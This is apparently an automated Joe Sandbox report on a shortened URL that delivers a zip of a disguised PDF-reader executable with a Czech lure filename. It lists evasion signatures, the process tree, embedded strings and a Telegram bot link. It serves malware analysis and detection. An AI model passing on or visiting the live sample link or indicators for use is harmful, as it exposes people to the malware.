Edit tour

Windows Analysis Report
https://tinyurl.com/yep5ph9f

Overview

General Information

Sample URL:	https://tinyurl.com/yep5ph9f
Analysis ID:	1649464
Infos:

Detection

Score:	52
Range:	0 - 100
Confidence:	100%

Signatures

Yara detected ZipBomb

Downloads suspicious files via Chrome

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 5372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,2845414822576318589,8729507620722358709,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

unarchiver.exe (PID: 6900 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)

7za.exe (PID: 6800 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)

conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4992 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe (PID: 3268 cmdline: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe MD5: 4864A55CFF27F686023456A22371E790)

chrome.exe (PID: 7024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tinyurl.com/yep5ph9f" MD5: E81F54E6C1129887AEA47E7D092680BF)

unarchiver.exe (PID: 3432 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)

7za.exe (PID: 596 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)

conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmp	JoeSecurity_ZipBomb	Yara detected ZipBomb	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

Source: C:\Windows\SysWOW64\unarchiver.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:	Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: SumatraPDF-no-MuPDF.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: SumatraPDF-1.5.3.0.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.14.dr
Source:	Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Images.png.14.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.14.dr
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Images.png.14.dr
Source:	Binary string: libmupdf.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp

Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://HDMHDMLoading...%s
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContribute
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlThe
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://blog.kowalczyk.infoKrzysztof
Source: Images.png.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Images.png.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Images.png.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopen
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://cn.haihaisoft.comhttp://www.haihaisoft.comcnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD
Source: Images.png.14.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Images.png.14.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Images.png.14.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Images.png.14.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Images.png.14.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Images.png.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Images.png.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Images.png.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://itexmac.sourceforge.net/SyncTeX.htmlJ
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPag
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://mupdf.comMuPDFpdf
Source: Images.png.14.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Images.png.14.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Images.png.14.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Images.png.14.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Images.png.14.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Images.png.14.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Images.png.14.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://p.yusukekamiyamane.com/Yusuke
Source: Images.png.14.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Images.png.14.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://william.famille-blum.org/William
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Digitized
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSo
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.drm-x.net/http://cn.drm-x.com/LicPrepare2008.aspxLicPrepare20082013.aspx.drm-x.com/2/%s?c
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.flashvidz.tk/Zenonprogram
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.freetype.org/FreeTypefont
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.haihaisoft.com/Contact.aspx
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.haihaisoft.com/Contact.aspx%u%?.Install_DirSoftware
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.haihaisoft.com/PDF_Reader_download.aspxhttp://www.drm-x.com/pdfversion.htmMS
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.haihaisoft.comSumatraPDF
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllbad
Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.zeniko.ch/#SumatraPDFSimon
Source: Evidence.??d??o??c??x.14.dr	String found in binary or memory: https://t.me/MEXX6toHNBot
Source: Images.png.14.dr	String found in binary or memory: https://www.globalsign.com/repository/0

System Summary

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\Ozn.men._o_zjiat.n._poruaen._pr.v_duaevn.ho_vlastnictv._.zip (copy)

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir5556_2049845984

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir5556_2049845984

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Code function: 18_2_6FDF57D7	18_2_6FDF57D7
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Code function: 18_2_6FDFE530	18_2_6FDFE530
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Code function: 18_2_6FDFF2EB	18_2_6FDFF2EB
Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe	Code function: 18_2_73D61BC7	18_2_73D61BC7

Source: Images.png.14.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: classification engine

Classification label: mal52.evad.win@38/11@0/10

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03

Source: C:\Windows\SysWOW64\unarchiver.exe

File created: C:\Users\user\AppData\Local\Temp\unarchiver.log

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,2845414822576318589,8729507620722358709,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tinyurl.com/yep5ph9f"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"
Source: C:\Windows\SysWOW64\7za.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe
Source: unknown	Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"
Source: C:\Windows\SysWOW64\7za.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,2845414822576318589,8729507620722358709,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
